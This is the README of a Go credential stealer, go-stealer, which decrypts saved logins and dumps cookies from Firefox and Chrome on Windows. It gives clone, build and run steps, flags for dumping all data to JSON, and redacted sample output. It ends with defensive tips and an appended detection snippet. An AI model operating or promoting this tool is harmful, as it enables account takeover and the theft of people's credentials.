Demonstration of gaining access to cookies & login credentials. Currently only supports Firefox & Chrome; planning to support Edge, but I have no interest in any other browser since the main purpose of this repo is just demonstration.
Special thanks to @lclevy for their implementation of credential decrypting; all algorithms I use for decrypting Firefox login credentials are just a replica of Firepwd. I just rewrote it completely in Go.
Please note that any illegal action related to this program is highly discouraged; anything done with this distribution is the user's responsibility and has nothing to do with me.
Currently only Windows is supported, and older versions of Firefox / Chrome might be incompatible (this is intentional since most people don't use older browsers anyway).
Install the Go compiler, > 1.18 if possible, but any version above 1.0 seems fine.
> go version
go version go1.18 windows/amd64
Clone this repository.
git clone https://github.com/idfp/go-stealer
Install required dependencies, then build it or just run as it is.
go build .
go-stealer.exe [Options]
or
go run . [Options]
There's no need to pass the profile directory; the program will find it on its own.
--browser Targeted browser, by default the value is "firefox".
-b Shorthand for --browser.
--check-credentials Check login credentials, by default this is turned off.
-c Shorthand for --check-credentials.
--dump-all Dump all cookies instead of just a specific host, --output is required for this.
-a Shorthand for --dump-all
--output JSON File to save all logged credentials.
-o You guessed it.
--web Specific host to look for when doing cookies logging.
-w Yes
This is what the result will look like; of course the private data is censored.
> go-stealer.exe -a -c -o result.json
Opening SQL File
accounts.google.com @ SMSV : [REDACTED]
.developers.google.com @ _ga : [REDACTED]
accounts.google.com @ ACCOUNT_CHOOSER : [REDACTED]
.google.com @ ANID : [REDACTED]
.fonts.google.com @ _ga : [REDACTED]
...
Site: https://id.heroku.com
Username: ri******@gmail.com
Password: ******
Site: https://discord.com
Username: ri******@gmail.com
Password: ******
Saving all result to result.json
To prevent yourself from being a victim of this attack, here are some tips for you:
- Prevent initial access to your device; this includes but is not limited to: executing random exe files, opening suspicious office documents, or visiting random websites.
- Activate 2FA whenever it's possible.
- Use a Firefox master password; this will prevent credential stealing in Firefox. It is brute-forceable, so choose the password carefully. They will still be able to steal your cookies and Chrome credentials anyway.
- Do not save any login credentials in your browser; either remember them or use a local password manager.
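
A detection-side complement to the tips above, as an added example that is not part of go-stealer: flag file-access events where anything other than the installed browser opens a Firefox or Chrome credential or cookie store. The event shape, the allowlisted install paths and the sample events are assumptions made for illustration; the store file names are the ones Firefox and Chrome use on disk.

```go
package main

import (
	"fmt"
	"strings"
)

// AccessEvent: simplified file-access audit record (hypothetical shape).
type AccessEvent struct{ Process, File string }

// File names Firefox and Chrome use for saved logins, keys and cookies.
var stores = map[string]bool{
	"logins.json": true, "key4.db": true, "cookies.sqlite": true, // Firefox
	"login data": true, "cookies": true, "local state": true, // Chrome
}

// Image paths allowed to open the stores (assumed default install paths).
var allowed = map[string]bool{
	"c:/program files/mozilla firefox/firefox.exe":          true,
	"c:/program files/google/chrome/application/chrome.exe": true,
}

func norm(p string) string { return strings.ToLower(strings.ReplaceAll(p, `\`, "/")) }

func isStore(file string) bool {
	f := norm(file)
	inProfile := strings.Contains(f, "/mozilla/firefox/profiles/") ||
		strings.Contains(f, "/google/chrome/user data/")
	return inProfile && stores[f[strings.LastIndex(f, "/")+1:]]
}

// Suspicious returns store accesses by processes outside the allowlist.
// Matching the full image path still flags a copy named firefox.exe elsewhere.
func Suspicious(events []AccessEvent) (hits []AccessEvent) {
	for _, e := range events {
		if isStore(e.File) && !allowed[norm(e.Process)] {
			hits = append(hits, e)
		}
	}
	return hits
}

// Constructed sample events, not real telemetry.
var sample = []AccessEvent{
	{`C:\Program Files\Mozilla Firefox\firefox.exe`, `C:\Users\u\AppData\Roaming\Mozilla\Firefox\Profiles\x.default\logins.json`},
	{`C:\Users\u\Downloads\tool.exe`, `C:\Users\u\AppData\Roaming\Mozilla\Firefox\Profiles\x.default\key4.db`},
	{`C:\Users\u\AppData\Local\Temp\firefox.exe`, `C:\Users\u\AppData\Local\Google\Chrome\User Data\Default\Login Data`},
}

func main() { fmt.Printf("%+v\n", Suspicious(sample)) }
```

Per-user browser installs and legitimate backup or sync tools would need their own allowlist entries before this is used on real telemetry.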